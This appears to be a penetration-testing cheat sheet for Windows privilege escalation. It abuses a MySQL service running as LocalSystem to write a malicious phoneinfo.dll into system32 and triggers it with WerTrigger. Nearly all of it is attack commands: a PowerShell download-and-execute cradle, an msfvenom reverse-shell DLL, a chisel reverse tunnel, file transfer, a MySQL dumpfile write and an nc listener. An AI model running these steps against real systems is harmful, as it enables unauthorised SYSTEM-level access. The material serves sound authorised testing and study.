Write permission

Local Enumeration

PS> iex (new-Object Net.WebClient).DownloadString('');Invoke-PrivescCheck

With the MySQL service under LocalSystem, you can 'write' a file to any location via MySQL!


PS> netstat -nat  # Check SQL (3306 by default) is running  
PS> cmd /c sc qc Mysql # Validating if Mysql is running under LocalSystem 

# If this is the local
Kali> chisel server --reverse -p 9000
PS> .\cl64.exe client R:3306: 

# WerTrigger 
# https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---privileged-file-write
# https://github.com/sailay1996/WerTrigger 

git clone https://github.com/sailay1996/WerTrigger 

# Use the shell below for phoneinfo.dll 
msfvenom --platform windows --arch x64 -p windows/x64/shell_reverse_tcp LHOST=  LPORT=1234 -f dll -o phoneinfo.dll

# Transfer files 
# Place Report.wer and WerTrigger.exe at the same directory
PS> wget -o WerTrigger.exe
PS> wget -o Report.wer
PS> wget -o phoneinfo.dll

# Connect to the MySQL from Kali
Kali> mysql -h -u root -p   # with password or maybe not required 

# Database connection
# MariaDB [(none)]> select load_file('C:\\\\Users\\Administrator\\Desktop\\proof.txt');

MariaDB [(none)]> select load_file('C:\\\\xampp\\htdocs\\phoneinfo.dll') into dumpfile 'C:\\\\Windows\\system32\\phoneinfo.dll';

PS> dir \windows\system32\phoneinfo.dll
Kali> rlwrap nc -nlvp 1234 
PS> .\WerTrigger.exe

Last updated